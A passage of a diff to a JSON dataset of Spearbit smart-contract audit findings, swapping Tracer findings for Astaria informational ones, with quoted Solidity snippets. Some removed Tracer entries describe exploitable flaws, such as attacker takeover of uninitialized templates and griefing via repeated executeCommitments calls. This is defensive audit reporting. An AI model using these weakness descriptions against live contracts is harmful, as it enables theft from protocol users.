public vault: VIData storage s = _loadVISlot(); if (s.allowListEnabled) { require(s.allowList[receiver]); } uint256 assets = totalAssets(); if (s.depositCap != 0 && assets >= s.depositCap) { revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED); }", "labels": [ "Spearbit", - "Tracer", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "The value of lastExecutionPrice fails to update if pool.poolUpkeep() reverts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The performUpkeepSinglePool() function of the PoolKeeper contract updates executionPrice[] with the latest price and calls pool.poolUpkeep() to process the price difference. However, pool.poolUpkeep() can revert, for example due to the checkInvariantsBeforeFunction modifier in mintTokens(). If pool.poolUpkeep() reverts then the previous price value is lost and the processing will not be accurate. There- fore, it is safer to store the new price only if pool.poolUpkeep() has been executed succesfully. function performUpkeepSinglePool(...) public override { ... int256 lastExecutionPrice = executionPrice[_pool]; executionPrice[_pool] = latestPrice; ... try pool.poolUpkeep(lastExecutionPrice, latestPrice, _boundedIntervals, _numberOfIntervals) { // previous price can get lost if poolUpkeep() reverts ... // executionPrice[_pool] should be updated here } catch Error(string memory reason) { ... } }", + "title": "Document why bytes4(0xffffffff) is chosen when CollateralToken acting as a Seaport zone to signal invalid orders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "bytes4(0xffffffff) to indicate a Seaport order using this zone is not a valid order.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Pools can be deployed with malicious or incorrect quote tokens and oracles", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The deployment of a pool via deployPool() is permissionless. The deployer provides several pa- rameters that have to be trusted by the users of a specific pool, these parameters include: oracleWrapper settlementEthOracle quoteToken invariantCheck If any one of them is malicious, then the pool and its value will be affected. Note: Separate findings are made for the deployer check (issue Authenticity check for oracles is not effective) and the invariantCheck (issue Two different invariantCheck variables used in PoolFactory.deployPool() ).", + "title": "CollateralToken.onERC721Received's use of depositFor stack variable is redundant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If we follow the logic of assigning values to depositFor in CollateralToken.onERC721Received, we notice that it will end up being from_. So its usage is redundant.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "pairTokenBase and poolBase template contracts instances are not initialized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The constructor of PoolFactory contract creates three template contract instances but only one is initialized: poolCommitterBase. The other two contract instances (pairTokenBase and poolBase) are not initial- ized. contract PoolFactory is IPoolFactory, Ownable { constructor(address _feeReceiver) { ... PoolToken pairTokenBase = new PoolToken(DEFAULT_NUM_DECIMALS); // not initialized pairTokenBaseAddress = address(pairTokenBase); LeveragedPool poolBase = new LeveragedPool(); // not initialized poolBaseAddress = address(poolBase); PoolCommitter poolCommitterBase = new PoolCommitter(); // is initialized poolCommitterBaseAddress = address(poolCommitterBase); ... /* initialise base PoolCommitter template (with dummy values) */ poolCommitterBase.initialize(address(this), address(this), address(this), owner(), 0, 0, 0); } This means an attacker can initialize the templates setting them as the owner, and perform owner actions on contracts such as minting tokens. This can be misleading for users of the protocol as these minted tokens seem to be valid tokens. In PoolToken.initialize() an attacker can become the owner by calling initialize() with an address under his control as a parameter. The same can happen in LeveragedPool.initialize() with the initialization parameter. 13 contract PoolToken is ERC20_Cloneable, IPoolToken { ... } contract ERC20_Cloneable is ERC20, Initializable { function initialize(address _pool, ) external initializer { // not called for the template contract owner = _pool; ... } } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ,! // not called for the template contract ... // set the owner of the pool. This is governance when deployed from the factory governance = initialization._owner; } }", + "title": "onlyOwner modifier can be defined to simplify the codebase", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "releaseToAddress checks whether the msg.sender is an owner of a collateral. CollateralToken already has a modifier onlyOwner(...), so the initial check in releaseToAddress can be delegated to the modifier.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Oracles are not updated before use", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The PoolKeeper contract uses two oracles but does not ensure that their prices are updated. The poll() function should be called on both oracles to get the first execution and the settlement / ETH prices. As it currently is, the code could operate on old data.", + "title": "Document liquidator's role for the protocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a lien's term end (stack.point.end <= block.timestamp), anyone can call the liquidate on AstariaRouter. There is no restriction on the msg.sender. The msg.sender will be set as the liquidator and if: The Seaport auction ends (3 days currently, set by the protocol), they can call liquidatorNFTClaim to claim the NFT. Or if the Seaport auction settles, the liquidator receives the liquidation fee.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "getPendingCommits() underreports commits", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "When frontRunningInterval > updateInterval, the PoolCommitter.getAppropriateUpdateIntervalId() function can return updateInterval IDs that are arbitrarily far into the future, especially if appropriateIntervalId > updateIntervalId + 1. Therefore, commits can also be made to these appropriate interval IDs far in the future by calling commit(). The PoolCommitter.getPendingCommits() function only checks the commits for updateIntervalId and updateIn- tervalId + 1, but needs to check up to updateIntervalId + factorDifference + 1. Currently, it is underreporting the pending commits which leads to the checkInvariants function not checking the correct values.", + "title": "Until ASTARIA_ROUTER gets filed for CollateralToken, CollateralToken can not receive ERC721s safely.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "ASTARIA_ROUTER is not set in the CollateralToken's constructor. So till an entity with an author- ity would file for it, CollateralToken is unable to safely receive an ERC721 token ( whenNotPaused and on- ERC721Received would revert).", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Authenticity check for oracles is not effective", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The deployPool() function verifies the authenticity of the oracleWrapper by calling its deployer() function. As the oracleWrapper is supplied via deploymentParameters, it can be a malicious contract whose deployer() function can return any value, including msg.sender. Note: this check does protect against frontrunning the deployment transaction of the same pool. See Undocu- mented frontrunning protection. function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, \"Deployer must be oracle wrapper owner\");", + "title": "_getMaxPotentialDebtForCollateral might have meant to be an internal function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_getMaxPotentialDebtForCollateral is defined as a public function. underscore which as a convention usually is used for internal or private functions.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Incorrect calculation of keeper reward", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The keeper reward is calculated as (keeperGas * tipPercent / 100) / 1e18. The division by 1e18 is incorrect and undervalues the reward for the keeper. The tip part of the keeper reward is essentially ignored. The likely cause of this miscalculation is based on the note at PoolKeeper.sol#244 which states the tip percent is in WAD units, but it really is a quad representation of a value in the range between 5 and 100. The comment at PoolKeeper.sol#L241 also incorrectly states that _keeperGas is in wei (usually referring to ETH), which is not the case as it is denominated in the quote token, but in WAD precision.", + "title": "return keyword can be removed from stopLiens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_stopLiens does not return any values but in stopLiens the return statement is used along with the non-existent return value of _stopLiens.", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "performUpkeepSinglePool() can result in a griefing attack when the pool has not been updated for many intervals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. This in turn will call executeCommitments() repeatedly. For each call to executeCommitments() the updateMintingFee() function will be called. This updates fees and changes them in an unexpected way. A griefing attack is possible by repeatedly calling executeCommitments() with boundedIntervals == true and numberOfIntervals == 0. Note: Also see issue It is not possible to call executeCommitments() for multiple old commits. It is also important that lastPriceTimestamp is only updated after the last executeCommitments(), otherwise it will revert. 17 function executeCommitments(bool boundedIntervals, uint256 numberOfIntervals) external override ,! onlyPool { ... uint256 upperBound = boundedIntervals ? numberOfIntervals : type(uint256).max; ... while (i < upperBound) { if (block.timestamp >= lastPriceTimestamp + updateInterval * counter) { // ,! lastPriceTimestamp shouldn't be updated too soon ... } } ... updateMintingFee(); // should do this once (in combination with _boundedIntervals==true) ... }", + "title": "LienToken's constructor does not set ASTARIA_ROUTER which makes some of the endpoints unfunc- tional", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "LienToken's constructor does not set ASTARIA_ROUTER. That means till an authorized entity calls file to set this parameter, the following functions would be broken/revert: buyoutLien _buyoutLien _payDebt getBuyout _getBuyout _isPublicVault setPayee, partially broken _paymentAH payDebtViaClearingHouse", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "It is not possible to call executeCommitments() for multiple old commits", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. In this context the following problem occurs: In the first run of poolUpkeep(), lastPriceTimestamp will be set to block.timestamp. In the next run of poolUpkeep(), processing will stop at require(intervalPassed(),..), because block.timestamp hasnt increased. This means the rest of the commitments wont be executed by executeCommitments() and updateIntervalId, which is updated in executeCommitments(), will start lagging. 18 function poolUpkeep(..., bool _boundedIntervals, uint256 _numberOfIntervals) external override ,! onlyKeeper { require(intervalPassed(), \"Update interval hasn't passed\"); // next time lastPriceTimestamp == ,! block.timestamp executePriceChange(_oldPrice, _newPrice); // should only to this once (in combination with ,! _boundedIntervals==true) IPoolCommitter(poolCommitter).executeCommitments(_boundedIntervals, _numberOfIntervals); lastPriceTimestamp = block.timestamp; // shouldn't update until all executeCommitments() are ,! processed } function intervalPassed() public view override returns (bool) { unchecked { return block.timestamp >= lastPriceTimestamp + updateInterval; } } }", + "title": "Document the approval process for a user's CollateralToken before calling commitToLiens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In the _executeCommitment's return statement: IVaultImplementation(c.lienRequest.strategy.vault).commitToLien( c, address(this) ); address(this) is the AstariaRouter. The call here to commitToLien enters into _validateCommitment with AstariaRouter as the receiver and so for it to no revert, the holder would have needed to set the approval for the router previously/beforehand: CT.isApprovedForAll(holder, receiver) // needs to be true 83", "labels": [ "Spearbit", - "Tracer", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Incorrect comparison in getUpdatedAggregateBalance()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "When the value of data.updateIntervalId accidentally happens to be larger data.currentUpdateIntervalId in the getUpdatedAggregateBalance() function, it will execute the rest of the function, which shouldnt happen. Although this is unlikely it is also very easy to prevent. function getUpdatedAggregateBalance(UpdateData calldata data) external pure returns (...) { if (data.updateIntervalId == data.currentUpdateIntervalId) { // Update interval has not passed: No change return (0, 0, 0, 0, 0); } }", + "title": "isValidRefinance's return statement can be reformatted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Currently, it is a bit hard to read the return statement of isValidRefinance.", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "updateAggregateBalance() can run out of gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The updateAggregateBalance() function of the PoolCommitter contract contains a for loop that, in theory, could use up all the gas and result in a revert. The updateAggregateBalance() function checks all future intervals every time it is called and adds them back to the unAggregatedCommitments array, which is checked in the next function call. This would only be a problem if frontRunningInterval is much larger than updateInterval, a situation that seems unlikely in practice. function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... uint256[] memory currentIntervalIds = unAggregatedCommitments[user]; uint256 unAggregatedLength = currentIntervalIds.length; for (uint256 i = 0; i < unAggregatedLength; i++) { uint256 id = currentIntervalIds[i]; ... UserCommitment memory commitment = userCommitments[user][id]; ... if (commitment.updateIntervalId < updateIntervalId) { ... } else { ... storageArrayPlaceHolder.push(currentIntervalIds[i]); // entry for future intervals stays ,! in array } } delete unAggregatedCommitments[user]; unAggregatedCommitments[user] = storageArrayPlaceHolder; ... }", + "title": "Withdraw Reserves should always be transferred before Commit to Lien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a new lien is requested, the _beforeCommitToLien() function is called. If the epoch is over, this calls processEpoch(). Otherwise, it calls transferWithdrawReserve(). function _beforeCommitToLien( IAstariaRouter.Commitment calldata params, address receiver ) internal virtual override(VaultImplementation) { VaultData storage s = _loadStorageSlot(); if (timeToEpochEnd() == uint256(0)) { processEpoch(); } else if (s.withdrawReserve > uint256(0)) { transferWithdrawReserve(); } } However, the processEpoch() function will fail if the withdraw reserves haven't been transferred. In this case, it would require the user to manually call transferWithdrawReserve() to fix things, and then request their lien again. Instead, the protocol should transfer the reserves whenever it is needed, and only then call processEpoch().", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Pool information might be lost if setFactory() of PoolKeeper contract is called", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The PoolKeeper contract has a function to change the factory: setFactory(). However, calling this function will make previous pools inaccessible for this PoolKeeper unless the new factory imports the pools from the old factory. The isUpkeepRequiredSinglePool() function calls factory.isValidPool(_pool), and it will fail because the new factory doesnt know about the old pools. As this call is essential for upkeeping, the entire upkeep mechanism will fail. function setFactory(address _factory) external override onlyOwner { factory = IPoolFactory(_factory); ... } function isUpkeepRequiredSinglePool(address _pool) public view override returns (bool) { if (!factory.isValidPool(_pool)) { // might not work if factory is changed return false; } ... }", + "title": "Remove owner() variable from withdraw proxies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a withdrawProxy is deployed, it is created with certain immutable arguments. Two of these values are owner() and vault(), and they will always be equal. They seem to be used interchangeably on the withdraw proxy itself, so should be consolidated into one variable.", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Ether could be lost when calling commit()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The commit() function sends the supplied ETH to makePaidClaimRequest() only if payForClaim == true. If the caller of commit() accidentally sends ETH when payForClaim == false then the ETH stays in the PoolCommitter contract and is effectively lost. Note: This was also documented in Secureums CARE Tracking function commit(...) external payable override checkInvariantsAfterFunction { ... if (payForClaim) { autoClaim.makePaidClaimRequest{value: msg.value}(msg.sender); } }", + "title": "Unnecessary checks in _validateCommitment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In _validateCommitment(), we check to confirm that either the sender of the message is adequately qualified to be making the decision to take a lien against the collateral (ie they are the holder, the operator, etc). However, the way this is checked is somewhat roundabout and can be substantially simplified. For example, we check require(operator == receiver); in a block that is only triggered if we've already validated that receiver != operator.", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Race condition if PoolFactory deploy pools before fees are set", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The deployPool function of PoolFactory contract can deploy pools before the changeInterval value and minting and burning fees are set. This means that fees would not be subtracted. The exact boundaries for the mintingFee, burningFee and changeInterval values arent clear. In some parts of the code < 1e18 is used, and in other parts <= 1e18. Furthermore, the initialize() function of the PoolCommitter contract doesnt check the value of changeInter- val. The setBurningFee(), setMintingFee() and setChangeInterval() functions of PoolCommitter contract dont check the new values. Finally, two representations of 1e18 are used: 1e18 and PoolSwapLibrary.WAD_PRECISION. contract PoolFactory is IPoolFactory, Ownable { function setMintAndBurnFeeAndChangeInterval(uint256 _mintingFee, uint256 _burningFee,...) ... { ... require(_mintingFee <= 1e18, \"Fee cannot be > 100%\"); require(_burningFee <= 1e18, \"Fee cannot be > 100%\"); require(_changeInterval <= 1e18, \"Change interval cannot be > 100%\"); mintingFee = _mintingFee; burningFee = _burningFee; changeInterval = _changeInterval; ... } function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ,! ... // no check that mintingFee, burningFee, changeInterval are set poolCommitter.initialize(..., mintingFee, burningFee, changeInterval, ...); } } 22 contract PoolCommitter is IPoolCommitter, Initializable { function initialize(... ,uint256 _mintingFee, uint256 _burningFee,... ) ... { ... require(_mintingFee < PoolSwapLibrary.WAD_PRECISION, \"Minting fee >= 100%\"); require(_burningFee < PoolSwapLibrary.WAD_PRECISION, \"Burning fee >= 100%\"); ... // no check on _changeInterval mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee); burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee); changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval); ... } function setBurningFee(uint256 _burningFee) external override onlyGov { burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee); // no check on _burningFee ... } function setMintingFee(uint256 _mintingFee) external override onlyGov { mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee); // no check on _mintingFee ... } function setChangeInterval(uint256 _changeInterval) external override onlyGov { changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval); // no check on ,! _changeInterval ... } function updateMintingFee(bytes16 longTokenPrice, bytes16 shortTokenPrice) private { ... if (PoolSwapLibrary.compareDecimals(mintingFee, MAX_MINTING_FEE) == 1) { // mintingFee is greater than 1 (100%). // We want to cap this at a theoretical max of 100% mintingFee = MAX_MINTING_FEE; // so mintingFee is allowed to be 1e18 } } }", + "title": "Comment or remove unused function parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Highlighted functions above take arguments which are never used. particular signature, comment that argument name, otherwise remove that argument completely. If the function has to have a Additional instances noted in Context above. LienToken.sol#L726 : LienStorage storage s input parameter is not used in _getRemainingInterest. It can be removed and this function can be pure. VaultImplementation.sol#L341 : incoming is not used buyoutLien, was this variable meant to be used?", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Committer not validated on withdraw claim and multi-paid claim", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "AutoClaim checks that the committer creating the claim request in makePaidClaimRequest and withdrawing the claim request in withdrawUserClaimRequest is a valid committer for the PoolFactory used in theAutoClaim initializer. The same security check should be done in all the other functions where the committer is passed as a function parameter.", + "title": "Zero address check can never fail", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The details.borrower != address(0) check will never be false in the current system as AstariaRouter.sol#L352-L354 will revert when ownerOf is address(0).", "labels": [ "Spearbit", - "Tracer", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Some SMAOracle and AutoClaim state variables can be declared as immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "In the SMAOracle contract, the oracle, periods, observer, scaler and updateInterval state vari- ables are not declared as immutable. In the AutoClaim contract, the poolFactory state variable is not declared as immutable. Since the mentioned variables are only initialized in the contracts constructors, they can be declared as immutable in order to save gas.", + "title": "UX differs between Router.commitToLiens and VaultImplementation.commitToLien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The Router function creates the Collateralized Token while the VaultImplementation requires the collateral owner to ERC721.safeTransferFrom to the CollateralToken contract prior to calling.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Use of counters can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "counter and i are both used as counters for the same loop. uint32 counter = 1; uint256 i = 0; ... while (i < upperBound) { ... unchecked { counter += 1; } i++; }", + "title": "Document what vaults are listed by Astaria", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Anyone can call newPublicVault with epochLength in the correct range to create a public vault.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "transferOwnership() function is inaccessible", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The ERC20_Cloneable contract contains a transferOwnership() function that may only be called by the owner, which is PoolFactory. However PoolFactory doesnt call the function so it is essentially dead code, making the deployment cost unnecessary additional gas. function transferOwnership(address _owner) external onlyOwner { require(_owner != address(0), \"Owner: setting to 0 address\"); owner = _owner; }", + "title": "Simplify nested if/else blocks in for loops", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are quite a few instances that nested if/else blocks are used in for loops and that is the only block in the for loop. 87 for ( ... ) { if () { ... } if else () { ... } ... if else () { ... } else { revert CustomError(); } }", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Use cached values when present", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The updateAggregateBalance() function creates a temporary variable id with the value currentIn- Immediately after that, currentIntervalIds[i] is used again. This could be replaced by id to tervalIds[i]. save gas. function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... for (uint256 i = 0; i < unAggregatedLength; i++) { uint256 id = currentIntervalIds[i]; if (currentIntervalIds[i] == 0) { // could use id continue; }", + "title": "Document the role guardian plays in the protocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The role of guardian is not documented.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "_invariantCheckContract stored twice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Both the PoolCommitter and LeveragedPool contracts store the value of _invariantCheckContract twice, both in invariantCheckContract and invariantCheck. This is not necessary and costs extra gas. contract PoolCommitter is IPoolCommitter, Initializable { ... address public invariantCheckContract; IInvariantCheck public invariantCheck; ... function initialize( ..., address _invariantCheckContract, ... ) external override initializer { ... invariantCheckContract = _invariantCheckContract; invariantCheck = IInvariantCheck(_invariantCheckContract); ... } } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { ... address public invariantCheckContract; IInvariantCheck public invariantCheck; ... function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ,! ... invariantCheckContract = initialization._invariantCheckContract; invariantCheck = IInvariantCheck(initialization._invariantCheckContract); } }", + "title": "strategistFee... have not been used can be removed from the codebase.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "strategistFeeNumerator and strategistFeeDenominator are not used except in getStrategist- Fee (which itself also has not been referred to by other contracts). It looks like these have been replaced by the vault fee which gets set by public vault owners when they create the vault.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Unnecessary if/else statement in LeveragedPool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "A boolean variable is used to indicate the type of token to mint. The if/else statement can be avoided by using LONG_INDEX or SHORT_INDEX as the parameter instead of a bool to indicate the use of long or short token. uint256 public constant LONG_INDEX = 0; uint256 public constant SHORT_INDEX = 1; ... function mintTokens(bool isLongToken,...){ if (isLongToken) { IPoolToken(tokens[LONG_INDEX]).mint(...); } else { IPoolToken(tokens[SHORT_INDEX]).mint(...); ...", + "title": "redeemFutureEpoch can be called directly from a public vault to avoid using the endpoint from AstariaRouter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "One can call the redeemFutureEpoch endpoint of the vault directly to avoid the extra gas of juggling assets and multiple contract calls when using the endpoint from AstariaRouter.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Uncached array length used in loop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The users array length is used in a for loop condition, therefore the length of the array is evaluated in every loop iteration. Evaluating it once and caching it can save gas. for (uint256 i; i < users.length; i++) { ... }", + "title": "Remove unused imports", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If an imported file is not used, it can be removed. LienToken.sol#L24 : since Base64 is only imported in this file, if not used it can be removed from the code- base.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Unnecessary deletion of array elements in a loop is expensive", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The unAggregatedCommitments[user] array is deleted after the for loop in updateAggregateBal- ance. Therefore, deleting the array elements one by one with delete unAggregatedCommitments[user][i]; in the loop body costs unnecessary gas.", + "title": "Reduce nesting by reverting early", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Code following this pattern: if () { } else { revert(); } can be simplified to remove nesting using custom errors: if (!) { revert(); } or if using require statements, it can be transformed into: require() ", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Zero-value transfers are allowed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Given that claim() can return 0 when the claim isnt valid yet due to updateInterval, the return value should be checked to avoid doing an unnecessary sendValue() call with amount 0. Address.sendValue( payable(msg.sender), claim(user, poolCommitterAddress, poolCommitter, currentUpdateIntervalId) );", + "title": "assembly can read constant global variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Yul cannot read global variables, but that is not true for a constant variable as its value is embedded in the bytecode. For instance, highlighted code above have the following pattern: bytes32 slot = WITHDRAW_PROXY_SLOT; assembly { s.slot := slot } Here, WITHDRAW_PROXY_SLOT is a constant which can be used directly in assembly code.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Unneeded onlyUnpaused modifier in setQuoteAndPool()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The setQuoteAndPool() function is only callable once, from the factory contract during deployment, due to the onlyFactory modifier. During this call, the contract is always unpaused, therefore the onlyUnpaused modifier is not necessary.", + "title": "Revert with error messages", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are many instances of require and revert statements being used without an accompanying error message. Error messages are useful for unit tests to ensure that a call reverted due the intended reason, and helps in identifying the root cause.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Unnecessary mapping access in AutoClaim.makePaidClaimRequest()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Resolving mappings consumes more gas than directly accessing the storage struct, therefore its more gas-efficient to use the already de-referenced variable than to resolve the mapping again. function makePaidClaimRequest(address user) external payable override onlyPoolCommitter { ClaimRequest storage request = claimRequests[user][msg.sender]; ... uint256 reward = claimRequests[user][msg.sender].reward; ... claimRequests[user][msg.sender].updateIntervalId = requestUpdateIntervalId; claimRequests[user][msg.sender].reward = msg.value;", + "title": "Mixed use of require and revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Astaria codebase uses a mix of require and revert statements. We suggest only following one of these ways to do conditional revert for standardization.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + 